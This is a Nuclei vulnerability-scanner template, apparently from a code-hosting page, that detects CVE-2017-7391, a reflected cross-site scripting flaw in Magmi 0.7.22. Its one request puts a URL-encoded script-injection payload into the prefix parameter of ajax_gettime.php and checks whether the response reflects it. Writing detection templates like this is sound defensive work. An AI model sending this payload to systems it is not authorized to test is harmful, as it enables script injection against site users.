nuclei-templates/cves/CVE-2017-7391.yaml

25 lines
857 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: cve-2017-7391
info:
name: Magmi Cross-Site Scripting v.0.7.22
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
# Issues:-https://github.com/dweeves/magmi-git/issues/522
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(document.domain);</script><'
part: body